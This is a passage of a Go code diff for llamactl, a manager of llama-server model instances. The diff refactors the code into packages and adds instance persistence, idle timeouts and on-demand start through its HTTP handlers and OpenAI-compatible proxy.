im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*Instance, 0, len(im.instances))
for _, instance := range im.instances {
instances = append(instances, instance)
instances := make([]*instance.Process, 0, len(im.instances))
for _, inst := range im.instances {
instances = append(instances, inst)
}
return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
err := ValidateInstanceName(name)
name, err := validation.ValidateInstanceName(name)
if err != nil {
return nil, err
}
err = ValidateInstanceOptions(options)
err = validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
@@ -70,6 +40,11 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
im.mu.Lock()
defer im.mu.Unlock()
// Check max instances limit after acquiring the lock
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
// Check if instance with this name already exists
if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name)
@@ -90,15 +65,19 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
im.ports[options.Port] = true
}
instance := NewInstance(name, &im.instancesConfig, options)
im.instances[instance.Name] = instance
inst := instance.NewInstance(name, &im.instancesConfig, options)
im.instances[inst.Name] = inst
im.ports[options.Port] = true
return instance, nil
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return inst, nil
}
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*Instance, error) {
func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
@@ -111,7 +90,7 @@ func (im *instanceManager) GetInstance(name string) (*Instance, error) {
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
@@ -124,7 +103,7 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
return nil, fmt.Errorf("instance options cannot be nil")
}
err := ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
@@ -149,6 +128,12 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
}
}
im.mu.Lock()
defer im.mu.Unlock()
if err := im.persistInstance(instance); err != nil {
return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
}
return instance, nil
}
@@ -157,23 +142,30 @@ func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
_, exists := im.instances[name]
instance, exists := im.instances[name]
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if im.instances[name].Running {
if instance.Running {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, im.instances[name].options.Port)
delete(im.ports, instance.GetOptions().Port)
delete(im.instances, name)
// Delete the instance's config file if persistence is enabled
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
}
return nil
}
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*Instance, error) {
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
@@ -189,11 +181,18 @@ func (im *instanceManager) StartInstance(name string) (*Instance, error) {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return instance, nil
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*Instance, error) {
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
@@ -209,11 +208,18 @@ func (im *instanceManager) StopInstance(name string) (*Instance, error) {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return instance, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*Instance, error) {
func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
instance, err := im.StopInstance(name)
if err != nil {
return nil, err
@@ -234,16 +240,3 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}

26
pkg/manager/timeout.go Normal file
View File

@@ -0,0 +1,26 @@
package manager
import "log"
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
var timeoutInstances []string
// Identify instances that should timeout
for _, inst := range im.instances {
if inst.ShouldTimeout() {
timeoutInstances = append(timeoutInstances, inst.Name)
}
}
im.mu.RUnlock() // Release read lock before calling StopInstance
// Stop the timed-out instances
for _, name := range timeoutInstances {
log.Printf("Instance %s has timed out, stopping it", name)
if _, err := im.StopInstance(name); err != nil {
log.Printf("Error stopping instance %s: %v", name, err)
} else {
log.Printf("Instance %s stopped successfully", name)
}
}
}

View File

@@ -1,501 +0,0 @@
package llamactl_test
import (
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstanceManager(t *testing.T) {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
manager := llamactl.NewInstanceManager(config)
if manager == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
if instance.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", instance.GetOptions().Port)
}
}
func TestCreateInstance_DuplicateName(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create first instance
_, err := manager.CreateInstance("test-instance", options1)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = manager.CreateInstance("test-instance", options2)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
}
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
// Create manager with low max instances limit
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 2, // Very low limit for testing
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances up to the limit
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to max instances limit
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestCreateInstance_PortAssignment(t *testing.T) {
manager := createTestManager()
// Create instance without specifying port
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Should auto-assign a port in the range
port := instance.GetOptions().Port
if port < 8000 || port > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port)
}
}
func TestCreateInstance_PortConflictDetection(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080, // Explicit port
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: 8080, // Same port - should conflict
},
}
// Create first instance
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// Try to create second instance with same port
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
}
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create multiple instances and verify they get different ports
instance1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
instance2, err := manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
port1 := instance1.GetOptions().Port
port2 := instance2.GetOptions().Port
if port1 == port2 {
t.Errorf("Expected different ports, both got %d", port1)
}
}
func TestCreateInstance_PortExhaustion(t *testing.T) {
// Create manager with very small port range
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 8001}, // Only 2 ports available
MaxInstances: 10, // Higher than available ports
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances to exhaust all ports
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to port exhaustion
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when ports are exhausted")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
t.Errorf("Expected port exhaustion error, got: %v", err)
}
}
func TestDeleteInstance_PortRelease(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Create instance with specific port
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete the instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-instance", options)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestGetInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance first
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Retrieve it
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
}
func TestGetInstance_NotFound(t *testing.T) {
manager := createTestManager()
_, err := manager.GetInstance("nonexistent")
if err == nil {
t.Error("Expected error for nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestListInstances(t *testing.T) {
manager := createTestManager()
// Initially empty
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected 0 instances, got %d", len(instances))
}
// Create some instances
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err = manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// List should return both
instances, err = manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 2 {
t.Errorf("Expected 2 instances, got %d", len(instances))
}
// Check names are present
names := make(map[string]bool)
for _, instance := range instances {
names[instance.Name] = true
}
if !names["instance1"] || !names["instance2"] {
t.Error("Expected both instance1 and instance2 in list")
}
}
func TestDeleteInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete it
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should no longer exist
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
}
func TestDeleteInstance_NotFound(t *testing.T) {
manager := createTestManager()
err := manager.DeleteInstance("nonexistent")
if err == nil {
t.Error("Expected error for deleting nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestUpdateInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Update it
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
if updated.GetOptions().Port != 8081 {
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
}
}
func TestUpdateInstance_NotFound(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.UpdateInstance("nonexistent", options)
if err == nil {
t.Error("Expected error for updating nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
// Helper function to create a test manager with standard config
func createTestManager() llamactl.InstanceManager {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
return llamactl.NewInstanceManager(config)
}

View File

@@ -1,10 +1,13 @@
package llamactl
package server
import (
"bytes"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"net/http"
"os/exec"
"strconv"
@@ -14,18 +17,34 @@ import (
)
type Handler struct {
InstanceManager InstanceManager
config Config
InstanceManager manager.InstanceManager
cfg config.AppConfig
}
func NewHandler(im InstanceManager, config Config) *Handler {
func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
return &Handler{
InstanceManager: im,
config: config,
cfg: cfg,
}
}
// HelpHandler godoc
// VersionHandler godoc
// @Summary Get llamactl version
// @Description Returns the version of the llamactl command
// @Tags version
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/plain")
fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
}
}
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server
// @Description Returns the help text for the llama server command
// @Tags server
@@ -34,7 +53,7 @@ func NewHandler(im InstanceManager, config Config) *Handler {
// @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/help [get]
func (h *Handler) HelpHandler() http.HandlerFunc {
func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
helpCmd := exec.Command("llama-server", "--help")
output, err := helpCmd.CombinedOutput()
@@ -47,7 +66,7 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
}
}
// VersionHandler godoc
// LlamaServerVersionHandler godoc
// @Summary Get version of llama server
// @Description Returns the version of the llama server command
// @Tags server
@@ -56,7 +75,7 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
versionCmd := exec.Command("llama-server", "--version")
output, err := versionCmd.CombinedOutput()
@@ -69,7 +88,7 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
}
}
// ListDevicesHandler godoc
// LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server
// @Tags server
@@ -78,7 +97,7 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
// @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/devices [get]
func (h *Handler) ListDevicesHandler() http.HandlerFunc {
func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
listCmd := exec.Command("llama-server", "--list-devices")
output, err := listCmd.CombinedOutput()
@@ -97,7 +116,7 @@ func (h *Handler) ListDevicesHandler() http.HandlerFunc {
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {array} Instance "List of instances"
// @Success 200 {array} instance.Process "List of instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances [get]
func (h *Handler) ListInstances() http.HandlerFunc {
@@ -124,8 +143,8 @@ func (h *Handler) ListInstances() http.HandlerFunc {
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} Instance "Created instance details"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} instance.Process "Created instance details"
// @Failure 400 {string} string "Invalid request body"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [post]
@@ -137,13 +156,13 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
return
}
var options CreateInstanceOptions
var options instance.CreateInstanceOptions
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
return
}
instance, err := h.InstanceManager.CreateInstance(name, &options)
inst, err := h.InstanceManager.CreateInstance(name, &options)
if err != nil {
http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
return
@@ -151,7 +170,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(http.StatusCreated)
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -165,7 +184,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Instance details"
// @Success 200 {object} instance.Process "Instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [get]
@@ -177,14 +196,14 @@ func (h *Handler) GetInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -199,8 +218,8 @@ func (h *Handler) GetInstance() http.HandlerFunc {
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} Instance "Updated instance details"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} instance.Process "Updated instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [put]
@@ -212,20 +231,20 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
return
}
var options CreateInstanceOptions
var options instance.CreateInstanceOptions
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
return
}
instance, err := h.InstanceManager.UpdateInstance(name, &options)
inst, err := h.InstanceManager.UpdateInstance(name, &options)
if err != nil {
http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -239,7 +258,7 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Started instance details"
// @Success 200 {object} instance.Process "Started instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/start [post]
@@ -251,14 +270,14 @@ func (h *Handler) StartInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.StartInstance(name)
inst, err := h.InstanceManager.StartInstance(name)
if err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -272,7 +291,7 @@ func (h *Handler) StartInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Stopped instance details"
// @Success 200 {object} instance.Process "Stopped instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/stop [post]
@@ -284,14 +303,14 @@ func (h *Handler) StopInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.StopInstance(name)
inst, err := h.InstanceManager.StopInstance(name)
if err != nil {
http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -305,7 +324,7 @@ func (h *Handler) StopInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Restarted instance details"
// @Success 200 {object} instance.Process "Restarted instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/restart [post]
@@ -317,14 +336,14 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.RestartInstance(name)
inst, err := h.InstanceManager.RestartInstance(name)
if err != nil {
http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -389,13 +408,13 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
logs, err := instance.GetLogs(num_lines)
logs, err := inst.GetLogs(num_lines)
if err != nil {
http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
return
@@ -426,19 +445,19 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !instance.Running {
if !inst.Running {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
// Get the cached proxy for this instance
proxy, err := instance.GetProxy()
proxy, err := inst.GetProxy()
if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return
@@ -453,6 +472,9 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
proxyPath = "/" + proxyPath
}
// Update the last request time for the instance
inst.UpdateLastRequestTime()
// Modify the request to remove the proxy prefix
originalPath := r.URL.Path
r.URL.Path = proxyPath
@@ -489,11 +511,11 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
}
openaiInstances := make([]OpenAIInstance, len(instances))
for i, instance := range instances {
for i, inst := range instances {
openaiInstances[i] = OpenAIInstance{
ID: instance.Name,
ID: inst.Name,
Object: "model",
Created: instance.Created,
Created: inst.Created,
OwnedBy: "llamactl",
}
}
@@ -545,24 +567,42 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
return
}
// Route to the appropriate instance based on model name
instance, err := h.InstanceManager.GetInstance(modelName)
// Route to the appropriate inst based on model name
inst, err := h.InstanceManager.GetInstance(modelName)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !instance.Running {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
if !inst.Running {
if inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart {
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
} else {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
}
proxy, err := instance.GetProxy()
proxy, err := inst.GetProxy()
if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return
}
// Update last request time for the instance
inst.UpdateLastRequestTime()
// Recreate the request body from the bytes we read
r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
